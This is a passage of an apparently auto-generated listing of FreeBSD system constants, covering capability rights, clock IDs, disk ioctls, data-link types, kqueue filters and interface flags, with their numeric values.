CAP_GETSOCKNAME = 0x200000200000000 constant CAP_GETSOCKOPT (line 273) | CAP_GETSOCKOPT = 0x200000400000000 constant CAP_IOCTL (line 274) | CAP_IOCTL = 0x400000000000080 constant CAP_IOCTLS_ALL (line 275) | CAP_IOCTLS_ALL = 0x7fffffff constant CAP_KQUEUE (line 276) | CAP_KQUEUE = 0x400000000100040 constant CAP_KQUEUE_CHANGE (line 277) | CAP_KQUEUE_CHANGE = 0x400000000100000 constant CAP_KQUEUE_EVENT (line 278) | CAP_KQUEUE_EVENT = 0x400000000000040 constant CAP_LINKAT_SOURCE (line 279) | CAP_LINKAT_SOURCE = 0x200020000000400 constant CAP_LINKAT_TARGET (line 280) | CAP_LINKAT_TARGET = 0x200000000400400 constant CAP_LISTEN (line 281) | CAP_LISTEN = 0x200000800000000 constant CAP_LOOKUP (line 282) | CAP_LOOKUP = 0x200000000000400 constant CAP_MAC_GET (line 283) | CAP_MAC_GET = 0x400000000000001 constant CAP_MAC_SET (line 284) | CAP_MAC_SET = 0x400000000000002 constant CAP_MKDIRAT (line 285) | CAP_MKDIRAT = 0x200000000800400 constant CAP_MKFIFOAT (line 286) | CAP_MKFIFOAT = 0x200000001000400 constant CAP_MKNODAT (line 287) | CAP_MKNODAT = 0x200000002000400 constant CAP_MMAP (line 288) | CAP_MMAP = 0x200000000000010 constant CAP_MMAP_R (line 289) | CAP_MMAP_R = 0x20000000000001d constant CAP_MMAP_RW (line 290) | CAP_MMAP_RW = 0x20000000000001f constant CAP_MMAP_RWX (line 291) | CAP_MMAP_RWX = 0x20000000000003f constant CAP_MMAP_RX (line 292) | CAP_MMAP_RX = 0x20000000000003d constant CAP_MMAP_W (line 293) | CAP_MMAP_W = 0x20000000000001e constant CAP_MMAP_WX (line 294) | CAP_MMAP_WX = 0x20000000000003e constant CAP_MMAP_X (line 295) | CAP_MMAP_X = 0x20000000000003c constant CAP_PDGETPID (line 296) | CAP_PDGETPID = 0x400000000000200 constant CAP_PDKILL (line 297) | CAP_PDKILL = 0x400000000000800 constant CAP_PDWAIT (line 298) | CAP_PDWAIT = 0x400000000000400 constant CAP_PEELOFF (line 299) | CAP_PEELOFF = 0x200001000000000 constant CAP_POLL_EVENT (line 300) | CAP_POLL_EVENT = 0x400000000000020 constant CAP_PREAD (line 301) | CAP_PREAD = 0x20000000000000d constant CAP_PWRITE (line 302) | CAP_PWRITE = 0x20000000000000e constant CAP_READ (line 303) | CAP_READ = 0x200000000000001 constant CAP_RECV (line 304) | CAP_RECV = 0x200000000000001 constant CAP_RENAMEAT_SOURCE (line 305) | CAP_RENAMEAT_SOURCE = 0x200000004000400 constant CAP_RENAMEAT_TARGET (line 306) | CAP_RENAMEAT_TARGET = 0x200040000000400 constant CAP_RIGHTS_VERSION (line 307) | CAP_RIGHTS_VERSION = 0x0 constant CAP_RIGHTS_VERSION_00 (line 308) | CAP_RIGHTS_VERSION_00 = 0x0 constant CAP_SEEK (line 309) | CAP_SEEK = 0x20000000000000c constant CAP_SEEK_TELL (line 310) | CAP_SEEK_TELL = 0x200000000000004 constant CAP_SEM_GETVALUE (line 311) | CAP_SEM_GETVALUE = 0x400000000000004 constant CAP_SEM_POST (line 312) | CAP_SEM_POST = 0x400000000000008 constant CAP_SEM_WAIT (line 313) | CAP_SEM_WAIT = 0x400000000000010 constant CAP_SEND (line 314) | CAP_SEND = 0x200000000000002 constant CAP_SETSOCKOPT (line 315) | CAP_SETSOCKOPT = 0x200002000000000 constant CAP_SHUTDOWN (line 316) | CAP_SHUTDOWN = 0x200004000000000 constant CAP_SOCK_CLIENT (line 317) | CAP_SOCK_CLIENT = 0x200007780000003 constant CAP_SOCK_SERVER (line 318) | CAP_SOCK_SERVER = 0x200007f60000003 constant CAP_SYMLINKAT (line 319) | CAP_SYMLINKAT = 0x200000008000400 constant CAP_TTYHOOK (line 320) | CAP_TTYHOOK = 0x400000000000100 constant CAP_UNLINKAT (line 321) | CAP_UNLINKAT = 0x200000010000400 constant CAP_UNUSED0_44 (line 322) | CAP_UNUSED0_44 = 0x200080000000000 constant CAP_UNUSED0_57 (line 323) | CAP_UNUSED0_57 = 0x300000000000000 constant CAP_UNUSED1_22 (line 324) | CAP_UNUSED1_22 = 0x400000000200000 constant CAP_UNUSED1_57 (line 325) | CAP_UNUSED1_57 = 0x500000000000000 constant CAP_WRITE (line 326) | CAP_WRITE = 0x200000000000002 constant CFLUSH (line 327) | CFLUSH = 0xf constant CLOCAL (line 328) | CLOCAL = 0x8000 constant CLOCK_MONOTONIC (line 329) | CLOCK_MONOTONIC = 0x4 constant CLOCK_MONOTONIC_FAST (line 330) | CLOCK_MONOTONIC_FAST = 0xc constant CLOCK_MONOTONIC_PRECISE (line 331) | CLOCK_MONOTONIC_PRECISE = 0xb constant CLOCK_PROCESS_CPUTIME_ID (line 332) | CLOCK_PROCESS_CPUTIME_ID = 0xf constant CLOCK_PROF (line 333) | CLOCK_PROF = 0x2 constant CLOCK_REALTIME (line 334) | CLOCK_REALTIME = 0x0 constant CLOCK_REALTIME_FAST (line 335) | CLOCK_REALTIME_FAST = 0xa constant CLOCK_REALTIME_PRECISE (line 336) | CLOCK_REALTIME_PRECISE = 0x9 constant CLOCK_SECOND (line 337) | CLOCK_SECOND = 0xd constant CLOCK_THREAD_CPUTIME_ID (line 338) | CLOCK_THREAD_CPUTIME_ID = 0xe constant CLOCK_UPTIME (line 339) | CLOCK_UPTIME = 0x5 constant CLOCK_UPTIME_FAST (line 340) | CLOCK_UPTIME_FAST = 0x8 constant CLOCK_UPTIME_PRECISE (line 341) | CLOCK_UPTIME_PRECISE = 0x7 constant CLOCK_VIRTUAL (line 342) | CLOCK_VIRTUAL = 0x1 constant CPUSTATES (line 343) | CPUSTATES = 0x5 constant CP_IDLE (line 344) | CP_IDLE = 0x4 constant CP_INTR (line 345) | CP_INTR = 0x3 constant CP_NICE (line 346) | CP_NICE = 0x1 constant CP_SYS (line 347) | CP_SYS = 0x2 constant CP_USER (line 348) | CP_USER = 0x0 constant CREAD (line 349) | CREAD = 0x800 constant CRTSCTS (line 350) | CRTSCTS = 0x30000 constant CS5 (line 351) | CS5 = 0x0 constant CS6 (line 352) | CS6 = 0x100 constant CS7 (line 353) | CS7 = 0x200 constant CS8 (line 354) | CS8 = 0x300 constant CSIZE (line 355) | CSIZE = 0x300 constant CSTART (line 356) | CSTART = 0x11 constant CSTATUS (line 357) | CSTATUS = 0x14 constant CSTOP (line 358) | CSTOP = 0x13 constant CSTOPB (line 359) | CSTOPB = 0x400 constant CSUSP (line 360) | CSUSP = 0x1a constant CTL_HW (line 361) | CTL_HW = 0x6 constant CTL_KERN (line 362) | CTL_KERN = 0x1 constant CTL_MAXNAME (line 363) | CTL_MAXNAME = 0x18 constant CTL_NET (line 364) | CTL_NET = 0x4 constant DIOCGATTR (line 365) | DIOCGATTR = 0xc148648e constant DIOCGDELETE (line 366) | DIOCGDELETE = 0x80106488 constant DIOCGFLUSH (line 367) | DIOCGFLUSH = 0x20006487 constant DIOCGFRONTSTUFF (line 368) | DIOCGFRONTSTUFF = 0x40086486 constant DIOCGFWHEADS (line 369) | DIOCGFWHEADS = 0x40046483 constant DIOCGFWSECTORS (line 370) | DIOCGFWSECTORS = 0x40046482 constant DIOCGIDENT (line 371) | DIOCGIDENT = 0x41006489 constant DIOCGMEDIASIZE (line 372) | DIOCGMEDIASIZE = 0x40086481 constant DIOCGPHYSPATH (line 373) | DIOCGPHYSPATH = 0x4400648d constant DIOCGPROVIDERNAME (line 374) | DIOCGPROVIDERNAME = 0x4400648a constant DIOCGSECTORSIZE (line 375) | DIOCGSECTORSIZE = 0x40046480 constant DIOCGSTRIPEOFFSET (line 376) | DIOCGSTRIPEOFFSET = 0x4008648c constant DIOCGSTRIPESIZE (line 377) | DIOCGSTRIPESIZE = 0x4008648b constant DIOCSKERNELDUMP (line 378) | DIOCSKERNELDUMP = 0x804c6490 constant DIOCSKERNELDUMP_FREEBSD11 (line 379) | DIOCSKERNELDUMP_FREEBSD11 = 0x80046485 constant DIOCZONECMD (line 380) | DIOCZONECMD = 0xc078648f constant DLT_A429 (line 381) | DLT_A429 = 0xb8 constant DLT_A653_ICM (line 382) | DLT_A653_ICM = 0xb9 constant DLT_AIRONET_HEADER (line 383) | DLT_AIRONET_HEADER = 0x78 constant DLT_AOS (line 384) | DLT_AOS = 0xde constant DLT_APPLE_IP_OVER_IEEE1394 (line 385) | DLT_APPLE_IP_OVER_IEEE1394 = 0x8a constant DLT_ARCNET (line 386) | DLT_ARCNET = 0x7 constant DLT_ARCNET_LINUX (line 387) | DLT_ARCNET_LINUX = 0x81 constant DLT_ATM_CLIP (line 388) | DLT_ATM_CLIP = 0x13 constant DLT_ATM_RFC1483 (line 389) | DLT_ATM_RFC1483 = 0xb constant DLT_AURORA (line 390) | DLT_AURORA = 0x7e constant DLT_AX25 (line 391) | DLT_AX25 = 0x3 constant DLT_AX25_KISS (line 392) | DLT_AX25_KISS = 0xca constant DLT_BACNET_MS_TP (line 393) | DLT_BACNET_MS_TP = 0xa5 constant DLT_BLUETOOTH_BREDR_BB (line 394) | DLT_BLUETOOTH_BREDR_BB = 0xff constant DLT_BLUETOOTH_HCI_H4 (line 395) | DLT_BLUETOOTH_HCI_H4 = 0xbb constant DLT_BLUETOOTH_HCI_H4_WITH_PHDR (line 396) | DLT_BLUETOOTH_HCI_H4_WITH_PHDR = 0xc9 constant DLT_BLUETOOTH_LE_LL (line 397) | DLT_BLUETOOTH_LE_LL = 0xfb constant DLT_BLUETOOTH_LE_LL_WITH_PHDR (line 398) | DLT_BLUETOOTH_LE_LL_WITH_PHDR = 0x100 constant DLT_BLUETOOTH_LINUX_MONITOR (line 399) | DLT_BLUETOOTH_LINUX_MONITOR = 0xfe constant DLT_CAN20B (line 400) | DLT_CAN20B = 0xbe constant DLT_CAN_SOCKETCAN (line 401) | DLT_CAN_SOCKETCAN = 0xe3 constant DLT_CHAOS (line 402) | DLT_CHAOS = 0x5 constant DLT_CHDLC (line 403) | DLT_CHDLC = 0x68 constant DLT_CISCO_IOS (line 404) | DLT_CISCO_IOS = 0x76 constant DLT_CLASS_NETBSD_RAWAF (line 405) | DLT_CLASS_NETBSD_RAWAF = 0x2240000 constant DLT_C_HDLC (line 406) | DLT_C_HDLC = 0x68 constant DLT_C_HDLC_WITH_DIR (line 407) | DLT_C_HDLC_WITH_DIR = 0xcd constant DLT_DBUS (line 408) | DLT_DBUS = 0xe7 constant DLT_DECT (line 409) | DLT_DECT = 0xdd constant DLT_DISPLAYPORT_AUX (line 410) | DLT_DISPLAYPORT_AUX = 0x113 constant DLT_DOCSIS (line 411) | DLT_DOCSIS = 0x8f constant DLT_DOCSIS31_XRA31 (line 412) | DLT_DOCSIS31_XRA31 = 0x111 constant DLT_DVB_CI (line 413) | DLT_DVB_CI = 0xeb constant DLT_ECONET (line 414) | DLT_ECONET = 0x73 constant DLT_EN10MB (line 415) | DLT_EN10MB = 0x1 constant DLT_EN3MB (line 416) | DLT_EN3MB = 0x2 constant DLT_ENC (line 417) | DLT_ENC = 0x6d constant DLT_EPON (line 418) | DLT_EPON = 0x103 constant DLT_ERF (line 419) | DLT_ERF = 0xc5 constant DLT_ERF_ETH (line 420) | DLT_ERF_ETH = 0xaf constant DLT_ERF_POS (line 421) | DLT_ERF_POS = 0xb0 constant DLT_ETHERNET_MPACKET (line 422) | DLT_ETHERNET_MPACKET = 0x112 constant DLT_FC_2 (line 423) | DLT_FC_2 = 0xe0 constant DLT_FC_2_WITH_FRAME_DELIMS (line 424) | DLT_FC_2_WITH_FRAME_DELIMS = 0xe1 constant DLT_FDDI (line 425) | DLT_FDDI = 0xa constant DLT_FLEXRAY (line 426) | DLT_FLEXRAY = 0xd2 constant DLT_FRELAY (line 427) | DLT_FRELAY = 0x6b constant DLT_FRELAY_WITH_DIR (line 428) | DLT_FRELAY_WITH_DIR = 0xce constant DLT_GCOM_SERIAL (line 429) | DLT_GCOM_SERIAL = 0xad constant DLT_GCOM_T1E1 (line 430) | DLT_GCOM_T1E1 = 0xac constant DLT_GPF_F (line 431) | DLT_GPF_F = 0xab constant DLT_GPF_T (line 432) | DLT_GPF_T = 0xaa constant DLT_GPRS_LLC (line 433) | DLT_GPRS_LLC = 0xa9 constant DLT_GSMTAP_ABIS (line 434) | DLT_GSMTAP_ABIS = 0xda constant DLT_GSMTAP_UM (line 435) | DLT_GSMTAP_UM = 0xd9 constant DLT_IBM_SN (line 436) | DLT_IBM_SN = 0x92 constant DLT_IBM_SP (line 437) | DLT_IBM_SP = 0x91 constant DLT_IEEE802 (line 438) | DLT_IEEE802 = 0x6 constant DLT_IEEE802_11 (line 439) | DLT_IEEE802_11 = 0x69 constant DLT_IEEE802_11_RADIO (line 440) | DLT_IEEE802_11_RADIO = 0x7f constant DLT_IEEE802_11_RADIO_AVS (line 441) | DLT_IEEE802_11_RADIO_AVS = 0xa3 constant DLT_IEEE802_15_4 (line 442) | DLT_IEEE802_15_4 = 0xc3 constant DLT_IEEE802_15_4_LINUX (line 443) | DLT_IEEE802_15_4_LINUX = 0xbf constant DLT_IEEE802_15_4_NOFCS (line 444) | DLT_IEEE802_15_4_NOFCS = 0xe6 constant DLT_IEEE802_15_4_NONASK_PHY (line 445) | DLT_IEEE802_15_4_NONASK_PHY = 0xd7 constant DLT_IEEE802_16_MAC_CPS (line 446) | DLT_IEEE802_16_MAC_CPS = 0xbc constant DLT_IEEE802_16_MAC_CPS_RADIO (line 447) | DLT_IEEE802_16_MAC_CPS_RADIO = 0xc1 constant DLT_INFINIBAND (line 448) | DLT_INFINIBAND = 0xf7 constant DLT_IPFILTER (line 449) | DLT_IPFILTER = 0x74 constant DLT_IPMB_KONTRON (line 450) | DLT_IPMB_KONTRON = 0xc7 constant DLT_IPMB_LINUX (line 451) | DLT_IPMB_LINUX = 0xd1 constant DLT_IPMI_HPM_2 (line 452) | DLT_IPMI_HPM_2 = 0x104 constant DLT_IPNET (line 453) | DLT_IPNET = 0xe2 constant DLT_IPOIB (line 454) | DLT_IPOIB = 0xf2 constant DLT_IPV4 (line 455) | DLT_IPV4 = 0xe4 constant DLT_IPV6 (line 456) | DLT_IPV6 = 0xe5 constant DLT_IP_OVER_FC (line 457) | DLT_IP_OVER_FC = 0x7a constant DLT_ISO_14443 (line 458) | DLT_ISO_14443 = 0x108 constant DLT_JUNIPER_ATM1 (line 459) | DLT_JUNIPER_ATM1 = 0x89 constant DLT_JUNIPER_ATM2 (line 460) | DLT_JUNIPER_ATM2 = 0x87 constant DLT_JUNIPER_ATM_CEMIC (line 461) | DLT_JUNIPER_ATM_CEMIC = 0xee constant DLT_JUNIPER_CHDLC (line 462) | DLT_JUNIPER_CHDLC = 0xb5 constant DLT_JUNIPER_ES (line 463) | DLT_JUNIPER_ES = 0x84 constant DLT_JUNIPER_ETHER (line 464) | DLT_JUNIPER_ETHER = 0xb2 constant DLT_JUNIPER_FIBRECHANNEL (line 465) | DLT_JUNIPER_FIBRECHANNEL = 0xea constant DLT_JUNIPER_FRELAY (line 466) | DLT_JUNIPER_FRELAY = 0xb4 constant DLT_JUNIPER_GGSN (line 467) | DLT_JUNIPER_GGSN = 0x85 constant DLT_JUNIPER_ISM (line 468) | DLT_JUNIPER_ISM = 0xc2 constant DLT_JUNIPER_MFR (line 469) | DLT_JUNIPER_MFR = 0x86 constant DLT_JUNIPER_MLFR (line 470) | DLT_JUNIPER_MLFR = 0x83 constant DLT_JUNIPER_MLPPP (line 471) | DLT_JUNIPER_MLPPP = 0x82 constant DLT_JUNIPER_MONITOR (line 472) | DLT_JUNIPER_MONITOR = 0xa4 constant DLT_JUNIPER_PIC_PEER (line 473) | DLT_JUNIPER_PIC_PEER = 0xae constant DLT_JUNIPER_PPP (line 474) | DLT_JUNIPER_PPP = 0xb3 constant DLT_JUNIPER_PPPOE (line 475) | DLT_JUNIPER_PPPOE = 0xa7 constant DLT_JUNIPER_PPPOE_ATM (line 476) | DLT_JUNIPER_PPPOE_ATM = 0xa8 constant DLT_JUNIPER_SERVICES (line 477) | DLT_JUNIPER_SERVICES = 0x88 constant DLT_JUNIPER_SRX_E2E (line 478) | DLT_JUNIPER_SRX_E2E = 0xe9 constant DLT_JUNIPER_ST (line 479) | DLT_JUNIPER_ST = 0xc8 constant DLT_JUNIPER_VP (line 480) | DLT_JUNIPER_VP = 0xb7 constant DLT_JUNIPER_VS (line 481) | DLT_JUNIPER_VS = 0xe8 constant DLT_LAPB_WITH_DIR (line 482) | DLT_LAPB_WITH_DIR = 0xcf constant DLT_LAPD (line 483) | DLT_LAPD = 0xcb constant DLT_LIN (line 484) | DLT_LIN = 0xd4 constant DLT_LINUX_EVDEV (line 485) | DLT_LINUX_EVDEV = 0xd8 constant DLT_LINUX_IRDA (line 486) | DLT_LINUX_IRDA = 0x90 constant DLT_LINUX_LAPD (line 487) | DLT_LINUX_LAPD = 0xb1 constant DLT_LINUX_PPP_WITHDIRECTION (line 488) | DLT_LINUX_PPP_WITHDIRECTION = 0xa6 constant DLT_LINUX_SLL (line 489) | DLT_LINUX_SLL = 0x71 constant DLT_LINUX_SLL2 (line 490) | DLT_LINUX_SLL2 = 0x114 constant DLT_LOOP (line 491) | DLT_LOOP = 0x6c constant DLT_LORATAP (line 492) | DLT_LORATAP = 0x10e constant DLT_LTALK (line 493) | DLT_LTALK = 0x72 constant DLT_MATCHING_MAX (line 494) | DLT_MATCHING_MAX = 0x114 constant DLT_MATCHING_MIN (line 495) | DLT_MATCHING_MIN = 0x68 constant DLT_MFR (line 496) | DLT_MFR = 0xb6 constant DLT_MOST (line 497) | DLT_MOST = 0xd3 constant DLT_MPEG_2_TS (line 498) | DLT_MPEG_2_TS = 0xf3 constant DLT_MPLS (line 499) | DLT_MPLS = 0xdb constant DLT_MTP2 (line 500) | DLT_MTP2 = 0x8c constant DLT_MTP2_WITH_PHDR (line 501) | DLT_MTP2_WITH_PHDR = 0x8b constant DLT_MTP3 (line 502) | DLT_MTP3 = 0x8d constant DLT_MUX27010 (line 503) | DLT_MUX27010 = 0xec constant DLT_NETANALYZER (line 504) | DLT_NETANALYZER = 0xf0 constant DLT_NETANALYZER_TRANSPARENT (line 505) | DLT_NETANALYZER_TRANSPARENT = 0xf1 constant DLT_NETLINK (line 506) | DLT_NETLINK = 0xfd constant DLT_NFC_LLCP (line 507) | DLT_NFC_LLCP = 0xf5 constant DLT_NFLOG (line 508) | DLT_NFLOG = 0xef constant DLT_NG40 (line 509) | DLT_NG40 = 0xf4 constant DLT_NORDIC_BLE (line 510) | DLT_NORDIC_BLE = 0x110 constant DLT_NULL (line 511) | DLT_NULL = 0x0 constant DLT_OPENFLOW (line 512) | DLT_OPENFLOW = 0x10b constant DLT_PCI_EXP (line 513) | DLT_PCI_EXP = 0x7d constant DLT_PFLOG (line 514) | DLT_PFLOG = 0x75 constant DLT_PFSYNC (line 515) | DLT_PFSYNC = 0x79 constant DLT_PKTAP (line 516) | DLT_PKTAP = 0x102 constant DLT_PPI (line 517) | DLT_PPI = 0xc0 constant DLT_PPP (line 518) | DLT_PPP = 0x9 constant DLT_PPP_BSDOS (line 519) | DLT_PPP_BSDOS = 0xe constant DLT_PPP_ETHER (line 520) | DLT_PPP_ETHER = 0x33 constant DLT_PPP_PPPD (line 521) | DLT_PPP_PPPD = 0xa6 constant DLT_PPP_SERIAL (line 522) | DLT_PPP_SERIAL = 0x32 constant DLT_PPP_WITH_DIR (line 523) | DLT_PPP_WITH_DIR = 0xcc constant DLT_PPP_WITH_DIRECTION (line 524) | DLT_PPP_WITH_DIRECTION = 0xa6 constant DLT_PRISM_HEADER (line 525) | DLT_PRISM_HEADER = 0x77 constant DLT_PROFIBUS_DL (line 526) | DLT_PROFIBUS_DL = 0x101 constant DLT_PRONET (line 527) | DLT_PRONET = 0x4 constant DLT_RAIF1 (line 528) | DLT_RAIF1 = 0xc6 constant DLT_RAW (line 529) | DLT_RAW = 0xc constant DLT_RDS (line 530) | DLT_RDS = 0x109 constant DLT_REDBACK_SMARTEDGE (line 531) | DLT_REDBACK_SMARTEDGE = 0x20 constant DLT_RIO (line 532) | DLT_RIO = 0x7c constant DLT_RTAC_SERIAL (line 533) | DLT_RTAC_SERIAL = 0xfa constant DLT_SCCP (line 534) | DLT_SCCP = 0x8e constant DLT_SCTP (line 535) | DLT_SCTP = 0xf8 constant DLT_SDLC (line 536) | DLT_SDLC = 0x10c constant DLT_SITA (line 537) | DLT_SITA = 0xc4 constant DLT_SLIP (line 538) | DLT_SLIP = 0x8 constant DLT_SLIP_BSDOS (line 539) | DLT_SLIP_BSDOS = 0xd constant DLT_STANAG_5066_D_PDU (line 540) | DLT_STANAG_5066_D_PDU = 0xed constant DLT_SUNATM (line 541) | DLT_SUNATM = 0x7b constant DLT_SYMANTEC_FIREWALL (line 542) | DLT_SYMANTEC_FIREWALL = 0x63 constant DLT_TI_LLN_SNIFFER (line 543) | DLT_TI_LLN_SNIFFER = 0x10d constant DLT_TZSP (line 544) | DLT_TZSP = 0x80 constant DLT_USB (line 545) | DLT_USB = 0xba constant DLT_USBPCAP (line 546) | DLT_USBPCAP = 0xf9 constant DLT_USB_DARWIN (line 547) | DLT_USB_DARWIN = 0x10a constant DLT_USB_FREEBSD (line 548) | DLT_USB_FREEBSD = 0xba constant DLT_USB_LINUX (line 549) | DLT_USB_LINUX = 0xbd constant DLT_USB_LINUX_MMAPPED (line 550) | DLT_USB_LINUX_MMAPPED = 0xdc constant DLT_USER0 (line 551) | DLT_USER0 = 0x93 constant DLT_USER1 (line 552) | DLT_USER1 = 0x94 constant DLT_USER10 (line 553) | DLT_USER10 = 0x9d constant DLT_USER11 (line 554) | DLT_USER11 = 0x9e constant DLT_USER12 (line 555) | DLT_USER12 = 0x9f constant DLT_USER13 (line 556) | DLT_USER13 = 0xa0 constant DLT_USER14 (line 557) | DLT_USER14 = 0xa1 constant DLT_USER15 (line 558) | DLT_USER15 = 0xa2 constant DLT_USER2 (line 559) | DLT_USER2 = 0x95 constant DLT_USER3 (line 560) | DLT_USER3 = 0x96 constant DLT_USER4 (line 561) | DLT_USER4 = 0x97 constant DLT_USER5 (line 562) | DLT_USER5 = 0x98 constant DLT_USER6 (line 563) | DLT_USER6 = 0x99 constant DLT_USER7 (line 564) | DLT_USER7 = 0x9a constant DLT_USER8 (line 565) | DLT_USER8 = 0x9b constant DLT_USER9 (line 566) | DLT_USER9 = 0x9c constant DLT_VSOCK (line 567) | DLT_VSOCK = 0x10f constant DLT_WATTSTOPPER_DLM (line 568) | DLT_WATTSTOPPER_DLM = 0x107 constant DLT_WIHART (line 569) | DLT_WIHART = 0xdf constant DLT_WIRESHARK_UPPER_PDU (line 570) | DLT_WIRESHARK_UPPER_PDU = 0xfc constant DLT_X2E_SERIAL (line 571) | DLT_X2E_SERIAL = 0xd5 constant DLT_X2E_XORAYA (line 572) | DLT_X2E_XORAYA = 0xd6 constant DLT_ZWAVE_R1_R2 (line 573) | DLT_ZWAVE_R1_R2 = 0x105 constant DLT_ZWAVE_R3 (line 574) | DLT_ZWAVE_R3 = 0x106 constant DT_BLK (line 575) | DT_BLK = 0x6 constant DT_CHR (line 576) | DT_CHR = 0x2 constant DT_DIR (line 577) | DT_DIR = 0x4 constant DT_FIFO (line 578) | DT_FIFO = 0x1 constant DT_LNK (line 579) | DT_LNK = 0xa constant DT_REG (line 580) | DT_REG = 0x8 constant DT_SOCK (line 581) | DT_SOCK = 0xc constant DT_UNKNOWN (line 582) | DT_UNKNOWN = 0x0 constant DT_WHT (line 583) | DT_WHT = 0xe constant ECHO (line 584) | ECHO = 0x8 constant ECHOCTL (line 585) | ECHOCTL = 0x40 constant ECHOE (line 586) | ECHOE = 0x2 constant ECHOK (line 587) | ECHOK = 0x4 constant ECHOKE (line 588) | ECHOKE = 0x1 constant ECHONL (line 589) | ECHONL = 0x10 constant ECHOPRT (line 590) | ECHOPRT = 0x20 constant EVFILT_AIO (line 591) | EVFILT_AIO = -0x3 constant EVFILT_EMPTY (line 592) | EVFILT_EMPTY = -0xd constant EVFILT_FS (line 593) | EVFILT_FS = -0x9 constant EVFILT_LIO (line 594) | EVFILT_LIO = -0xa constant EVFILT_PROC (line 595) | EVFILT_PROC = -0x5 constant EVFILT_PROCDESC (line 596) | EVFILT_PROCDESC = -0x8 constant EVFILT_READ (line 597) | EVFILT_READ = -0x1 constant EVFILT_SENDFILE (line 598) | EVFILT_SENDFILE = -0xc constant EVFILT_SIGNAL (line 599) | EVFILT_SIGNAL = -0x6 constant EVFILT_SYSCOUNT (line 600) | EVFILT_SYSCOUNT = 0xd constant EVFILT_TIMER (line 601) | EVFILT_TIMER = -0x7 constant EVFILT_USER (line 602) | EVFILT_USER = -0xb constant EVFILT_VNODE (line 603) | EVFILT_VNODE = -0x4 constant EVFILT_WRITE (line 604) | EVFILT_WRITE = -0x2 constant EVNAMEMAP_NAME_SIZE (line 605) | EVNAMEMAP_NAME_SIZE = 0x40 constant EV_ADD (line 606) | EV_ADD = 0x1 constant EV_CLEAR (line 607) | EV_CLEAR = 0x20 constant EV_DELETE (line 608) | EV_DELETE = 0x2 constant EV_DISABLE (line 609) | EV_DISABLE = 0x8 constant EV_DISPATCH (line 610) | EV_DISPATCH = 0x80 constant EV_DROP (line 611) | EV_DROP = 0x1000 constant EV_ENABLE (line 612) | EV_ENABLE = 0x4 constant EV_EOF (line 613) | EV_EOF = 0x8000 constant EV_ERROR (line 614) | EV_ERROR = 0x4000 constant EV_FLAG1 (line 615) | EV_FLAG1 = 0x2000 constant EV_FLAG2 (line 616) | EV_FLAG2 = 0x4000 constant EV_FORCEONESHOT (line 617) | EV_FORCEONESHOT = 0x100 constant EV_ONESHOT (line 618) | EV_ONESHOT = 0x10 constant EV_RECEIPT (line 619) | EV_RECEIPT = 0x40 constant EV_SYSFLAGS (line 620) | EV_SYSFLAGS = 0xf000 constant EXTA (line 621) | EXTA = 0x4b00 constant EXTATTR_MAXNAMELEN (line 622) | EXTATTR_MAXNAMELEN = 0xff constant EXTATTR_NAMESPACE_EMPTY (line 623) | EXTATTR_NAMESPACE_EMPTY = 0x0 constant EXTATTR_NAMESPACE_SYSTEM (line 624) | EXTATTR_NAMESPACE_SYSTEM = 0x2 constant EXTATTR_NAMESPACE_USER (line 625) | EXTATTR_NAMESPACE_USER = 0x1 constant EXTB (line 626) | EXTB = 0x9600 constant EXTPROC (line 627) | EXTPROC = 0x800 constant FD_CLOEXEC (line 628) | FD_CLOEXEC = 0x1 constant FD_SETSIZE (line 629) | FD_SETSIZE = 0x400 constant FLUSHO (line 630) | FLUSHO = 0x800000 constant F_CANCEL (line 631) | F_CANCEL = 0x5 constant F_DUP2FD (line 632) | F_DUP2FD = 0xa constant F_DUP2FD_CLOEXEC (line 633) | F_DUP2FD_CLOEXEC = 0x12 constant F_DUPFD (line 634) | F_DUPFD = 0x0 constant F_DUPFD_CLOEXEC (line 635) | F_DUPFD_CLOEXEC = 0x11 constant F_GETFD (line 636) | F_GETFD = 0x1 constant F_GETFL (line 637) | F_GETFL = 0x3 constant F_GETLK (line 638) | F_GETLK = 0xb constant F_GETOWN (line 639) | F_GETOWN = 0x5 constant F_OGETLK (line 640) | F_OGETLK = 0x7 constant F_OK (line 641) | F_OK = 0x0 constant F_OSETLK (line 642) | F_OSETLK = 0x8 constant F_OSETLKW (line 643) | F_OSETLKW = 0x9 constant F_RDAHEAD (line 644) | F_RDAHEAD = 0x10 constant F_RDLCK (line 645) | F_RDLCK = 0x1 constant F_READAHEAD (line 646) | F_READAHEAD = 0xf constant F_SETFD (line 647) | F_SETFD = 0x2 constant F_SETFL (line 648) | F_SETFL = 0x4 constant F_SETLK (line 649) | F_SETLK = 0xc constant F_SETLKW (line 650) | F_SETLKW = 0xd constant F_SETLK_REMOTE (line 651) | F_SETLK_REMOTE = 0xe constant F_SETOWN (line 652) | F_SETOWN = 0x6 constant F_UNLCK (line 653) | F_UNLCK = 0x2 constant F_UNLCKSYS (line 654) | F_UNLCKSYS = 0x4 constant F_WRLCK (line 655) | F_WRLCK = 0x3 constant HUPCL (line 656) | HUPCL = 0x4000 constant HW_MACHINE (line 657) | HW_MACHINE = 0x1 constant ICANON (line 658) | ICANON = 0x100 constant ICMP6_FILTER (line 659) | ICMP6_FILTER = 0x12 constant ICRNL (line 660) | ICRNL = 0x100 constant IEXTEN (line 661) | IEXTEN = 0x400 constant IFAN_ARRIVAL (line 662) | IFAN_ARRIVAL = 0x0 constant IFAN_DEPARTURE (line 663) | IFAN_DEPARTURE = 0x1 constant IFCAP_WOL_MAGIC (line 664) | IFCAP_WOL_MAGIC = 0x2000 constant IFF_ALLMULTI (line 665) | IFF_ALLMULTI = 0x200 constant IFF_ALTPHYS (line 666) | IFF_ALTPHYS = 0x4000 constant IFF_BROADCAST (line 667) | IFF_BROADCAST = 0x2 constant IFF_CANTCHANGE (line 668) | IFF_CANTCHANGE = 0x218f52 constant IFF_CANTCONFIG (line 669) | IFF_CANTCONFIG = 0x10000 constant IFF_DEBUG (line 670) | IFF_DEBUG = 0x4 constant IFF_DRV_OACTIVE (line 671) | IFF_DRV_OACTIVE = 0x400 constant IFF_DRV_RUNNING (line 672) | IFF_DRV_RUNNING = 0x40 constant IFF_DYING (line 673) | IFF_DYING = 0x200000 constant IFF_LINK0 (line 674) | IFF_LINK0 = 0x1000 constant IFF_LINK1 (line 675) | IFF_LINK1 = 0x2000 constant IFF_LINK2 (line 676) | IFF_LINK2 = 0x4000 constant IFF_LOOPBACK (line 677) | IFF_LOOPBACK = 0x8 constant IFF_MONITOR (line 678) | IFF_MONITOR = 0x40000 constant IFF_MULTICAST (line 679) | IFF_MULTICAST = 0x8000 constant IFF_NOARP (line 680) | IFF_NOARP 